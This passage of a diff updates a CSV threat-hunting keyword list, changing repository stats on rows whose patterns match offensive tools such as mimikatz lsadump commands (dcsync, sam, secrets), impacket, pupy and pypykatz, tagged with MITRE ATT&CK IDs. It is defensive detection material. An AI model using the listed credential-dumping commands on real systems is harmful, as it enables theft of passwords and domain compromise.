Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" -"*Londor.exe -t Coverage*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*Londor.exe -t Script*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*Londor.exe -t Coverage*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*Londor.exe -t Script*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*looCiprian/GC2-sheet*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" "*lookupsid.py -hashes :* *@* 0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking 
environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*loot_memory.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*loot_memory.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*LordNoteworthy*","offensive_tool_keyword","Github Username","Github username of hacker known for malware pocs and windows exploitations","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*lotus2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lotus2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Lovely-Potato*","offensive_tool_keyword","Lovely-Potato","Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. another Local Privilege Escalation tool. from a Windows Service Accounts to NT AUTHORITY\SYSTEM","T1055 - T1547.002 - T1543.003 - T1059.001","TA0004 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/TsukiCTF/Lovely-Potato","1","0","N/A","N/A","2","131","29","2021-07-21T18:09:14Z","2019-05-17T19:37:20Z" "*lsa_decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*lsa_decryptor_nt*.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*lsa_secrets.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*lsa_secrets.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*lsadump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*lsadump::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::changentlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::dcshadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::dcsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::lsa*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::mbc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::netsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::packages*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::postzerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::RpData*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::sam*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::secrets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::setntlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::zerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts 
passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::changentlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::dcshadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::dcsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::lsa*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::mbc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
